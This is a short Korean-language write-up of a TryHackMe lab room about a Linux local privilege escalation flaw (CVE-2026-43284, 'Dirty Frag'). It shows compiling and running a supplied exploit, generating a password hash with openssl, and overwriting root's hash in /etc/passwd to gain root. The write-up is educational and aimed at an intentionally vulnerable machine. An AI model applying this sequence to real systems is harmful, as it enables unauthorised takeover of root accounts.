
TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup
룸: CVE-2026-43284: Dirty Frag 분류: Linux 권한 상승 작성자: (내 페이지)
Dirty Frag는 CVE-2026-43284를 기반으로 구축된 연쇄적인 Linux 로컬 권한 상승(LPE) 룸입니다. 목표는 제공된 개념 증명 익스플로잇을 이용하여 권한 없는 셸에서 root로 전환하는 것입니다.
작업 디렉터리를 나열하면 익스플로잇에 제공된 파일들이 표시됩니다:
$ ls
README.txt
exp
exp.c
exp.c — 익스플로잇 소스 코드exp — 사전 컴파일된 바이너리 (대상 환경과 일치하지 않을 수 있음)README.txt — 익스플로잇과 함께 제공되는 사용 지침제공된 exp 바이너리가 대상의 정확한 환경과 호환되지 않을 수 있으므로, 소스에서 다시 빌드하는 것이 더 안전합니다:
$ gcc -O0 -Wall -o exp exp.c -lutil
-O0 — 컴파일러 최적화를 비활성화하여 동작을 예측 가능하게 유지하고 소스와 일치시킵니다-Wall — 컴파일러 경고를 활성화하여 빌드의 정상 여부를 확인하는 데 유용합니다-lutil — libutil을 링크합니다. 코드가 의사 터미널(pty) 함수를 사용할 때 일반적으로 필요합니다$ ./exp
컴파일된 익스플로잇을 실행하면 기본 결함이 트리거되어, 일반적으로 권한 없는 사용자에게 읽기 전용이어야 하는 파일 — 이 경우 /etc/passwd — 에 쓰기 액세스 권한이 생깁니다.
쓰기 액세스 권한을 얻은 후 root에 대한 새 비밀번호 해시가 생성됩니다:
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..
이 해시는 /etc/passwd에서 root의 기존 해시 필드 자리에 작성됩니다:
$ nano /etc/passwd
이제 root의 비밀번호를 알았으므로 사용자 전환은 간단합니다:
$ su root
$ cat /root/flag.txt
THM{REDACTED}
이 글은 교육 목적으로 완료된 TryHackMe 룸을 문서화한 것입니다. 대상 환경은 TryHackMe가 제공하는 의도적으로 취약한 머신입니다.